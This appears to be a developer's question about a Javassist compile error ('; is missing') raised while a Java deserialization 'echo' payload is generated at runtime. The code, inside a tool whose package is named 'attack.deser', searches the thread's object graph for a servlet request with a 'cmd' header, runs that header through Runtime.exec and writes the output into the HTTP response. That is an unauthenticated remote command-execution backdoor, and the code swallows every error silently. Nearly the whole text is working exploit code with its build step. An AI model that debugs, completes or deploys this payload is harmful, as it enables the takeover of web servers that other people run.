I want to transform this class using Javassist
/**
 * Unauthenticated command-execution "echo" class, documented here for reviewers and defenders.
 *
 * Constructing an instance walks the object graph reachable from the current thread's fields,
 * looking for a live HttpServletRequest that carries a header named "cmd". When one is found,
 * the header value is run as an operating-system command and the command's standard output is
 * written into the matching HTTP response.
 *
 * Indicators visible in this code:
 *  - an HTTP request header named "cmd";
 *  - a child process started from the servlet container's JVM via Runtime.exec;
 *  - reflective Field.setAccessible(true) over every field reachable from Thread.currentThread();
 *  - every exception is swallowed, so failures leave no application log entry.
 */
public class dfs {
// Objects already visited by the walk; membership is decided by HashSet (equals/hashCode).
static java.util.HashSet<Object> h;
// Request located by the walk; stays null until a request with a "cmd" header is found.
static javax.servlet.http.HttpServletRequest r;
// Response obtained from that request; stays null until the reflective lookup succeeds.
static javax.servlet.http.HttpServletResponse p;
/**
 * Resets the shared static state and starts the walk from the current thread at depth 0.
 * All work happens as a side effect of construction; the instance itself holds no state.
 */
public dfs(){
r = null;
p = null;
h =new java.util.HashSet<Object>();
F(Thread.currentThread(),0);
}
/**
 * Visited check with a side effect.
 *
 * @param obj candidate object, may be null
 * @return true when obj is null or was already recorded; false after recording it for the first time
 */
private static boolean i(Object obj){
if(obj==null|| h.contains(obj)){
return true;
}
h.add(obj);
return false;
}
/**
 * Inspects one object found by the walk and either acts on it or descends into its fields.
 *
 * @param o     object read from a field (or an element of an array field)
 * @param depth current nesting level; the walk stops once it exceeds 52
 */
private static void p(Object o, int depth){
// Stop when the depth cap is exceeded or when both request and response are already held.
if(depth > 52||(r !=null&& p !=null)){
return;
}
if(!i(o)){
if(r ==null&&javax.servlet.http.HttpServletRequest.class.isAssignableFrom(o.getClass())){
r = (javax.servlet.http.HttpServletRequest)o;
// Only a request that carries the "cmd" header is kept; any other request is discarded.
if(r.getHeader("cmd")==null) {
r = null;
}else{
try {
// getResponse is looked up on the concrete request class by reflection; it is not part of
// the javax.servlet.http.HttpServletRequest interface, so this relies on the container's
// implementation exposing such a method. Any failure drops the request again.
p = (javax.servlet.http.HttpServletResponse) r.getClass().getMethod("getResponse").invoke(r);
} catch (Exception e) {
r = null;
}
}
}
if(r !=null&& p !=null){
try {
// SECURITY: the raw "cmd" header value goes to Runtime.exec with no authentication,
// allow-list or validation, and the process's standard output (stderr is not read) is
// returned to the client in the response body.
p.getWriter().println(new java.util.Scanner(Runtime.getRuntime().exec(r.getHeader("cmd")).getInputStream()).useDelimiter("\\A").next());
p.getWriter().flush();
}catch (Exception e){
// Deliberately silent: errors are neither logged nor reported.
}
return;
}
// Not a usable request: continue the walk one level deeper.
F(o,depth+1);
}
}
/**
 * Reads every declared field of start, across its class and all superclasses, and hands each
 * value (or each element of an array value) to p.
 *
 * @param start object whose fields are read
 * @param depth nesting level passed through to p
 */
private static void F(Object start, int depth){
Class n=start.getClass();
do{
for (java.lang.reflect.Field declaredField : n.getDeclaredFields()) {
// Bypasses Java access checks so private and protected fields can be read as well.
declaredField.setAccessible(true);
Object o = null;
try{
o = declaredField.get(start);
// A null field value throws NullPointerException here and a primitive array fails the
// Object[] cast below; both are absorbed by the catch and the field is skipped.
if(!o.getClass().isArray()){
p(o,depth);
}else{
for (Object q : (Object[]) o) {
p(q, depth);
}
}
}catch (Exception e){
// Deliberately silent: unreadable fields are skipped.
}
}
}while(
(n = n.getSuperclass())!=null
);
}
}
The transformation code is as follows:
// Builds the class at runtime with Javassist instead of compiling it with javac: an empty class
// is created, then each field and method is compiled from a Java source string.
// pool is presumably a javassist.ClassPool created outside this excerpt.
// NOTE(review): the class name changes on every run (System.nanoTime() suffix), so matching on
// the class name is not a reliable detection; the behaviour is what stays constant: the "cmd"
// header lookup, the reflective "getResponse" call and Runtime.exec.
CtClass clazz = pool.makeClass("com.xxx.x.Test" + System.nanoTime());
// Removes the first declared constructor when the new class reports any.
if ((clazz.getDeclaredConstructors()).length != 0) {
clazz.removeConstructor(clazz.getDeclaredConstructors()[0]);
}
// Static state: visited set, located request, located response.
clazz.addField(CtField.make("static java.util.HashSet/*<Object>*/ h;", clazz));
clazz.addField(CtField.make("static javax.servlet.http.HttpServletRequest r;",clazz));
clazz.addField(CtField.make("static javax.servlet.http.HttpServletResponse p;",clazz));
// i: visited check that records the object on first sight.
clazz.addMethod(CtMethod.make("private static boolean i(Object obj){ if(obj==null|| h.contains(obj)){ return true; } h.add(obj); return false; }",clazz));
// F: reflective walk over the declared fields of an object and its superclasses.
clazz.addMethod(CtMethod.make("private static void F(Object start, int depth){ Class n=start.getClass(); do{ for (Field declaredField : n.getDeclaredFields()) { declaredField.setAccessible(true); Object o = null; try{ o = declaredField.get(start); if(!o.getClass().isArray()){ p(o,depth); }else{ for (Object q : (Object[]) o) { p(q, depth); } } }catch (Exception e){ } } }while( (n = n.getSuperclass())!=null ); }",clazz));
// p: SECURITY: passes the unauthenticated, unvalidated "cmd" request header to Runtime.exec
// and writes the command's standard output into the HTTP response.
clazz.addMethod(CtMethod.make("private static void p(Object o, int depth){ if(depth > 52||(r !=null&& p !=null)){ return; } if(!i(o)){ if(r ==null&&javax.servlet.http.HttpServletRequest.class.isAssignableFrom(o.getClass())){ r = (javax.servlet.http.HttpServletRequest)o; if(r.getHeader(\"cmd\")==null) { r = null; }else{ try { p = (javax.servlet.http.HttpServletResponse) r.getClass().getMethod(\"getResponse\",null).invoke(r,null); } catch (Exception e) { r = null; } } } if(r !=null&& p !=null){ try { p.getWriter().println(new java.util.Scanner(Runtime.getRuntime().exec(r.getHeader(\"cmd\")).getInputStream()).useDelimiter(\"\\\\A\").next()); p.getWriter().flush(); }catch (Exception e){ } return; } F(o,depth+1); } }",clazz));
// Entry point source: resets the static state and starts the walk from the current thread.
clazz.addMethod(CtMethod.make("public dfs(){ r = null; p = null; h =new java.util.HashSet/*<Object>*/(); F(Thread.currentThread(),0); }",clazz));
I encountered the following error:
Exception in thread "main" javassist.CannotCompileException: [source error] ; is missing
at javassist.CtNewMethod.make(CtNewMethod.java:84)
at javassist.CtNewMethod.make(CtNewMethod.java:50)
at javassist.CtMethod.make(CtMethod.java:140)
at com.summersec.attack.deser.echo.AllEcho.genPayload(AllEcho.java:25)
at com.summersec.attack.deser.util.Gadgets.createTemplatesImpl(Gadgets.java:65)
at com.summersec.attack.deser.util.Gadgets.createTemplatesImpl(Gadgets.java:57)
at com.summersec.attack.deser.echo.AllEcho.main(AllEcho.java:36)
Caused by: compile error: ; is missing
at javassist.compiler.Parser.parseDeclarators(Parser.java:643)
at javassist.compiler.Parser.parseDeclarationOrExpression(Parser.java:600)
at javassist.compiler.Parser.parseFor(Parser.java:380)
at javassist.compiler.Parser.parseStatement(Parser.java:279)
at javassist.compiler.Parser.parseBlock(Parser.java:307)
at javassist.compiler.Parser.parseStatement(Parser.java:261)
at javassist.compiler.Parser.parseDo(Parser.java:351)
at javassist.compiler.Parser.parseStatement(Parser.java:277)
at javassist.compiler.Parser.parseBlock(Parser.java:307)
at javassist.compiler.Parser.parseMethod2(Parser.java:172)
at javassist.compiler.Javac.compileMethod(Javac.java:156)
at javassist.compiler.Javac.compile(Javac.java:102)
at javassist.CtNewMethod.make(CtNewMethod.java:79)
... 6 more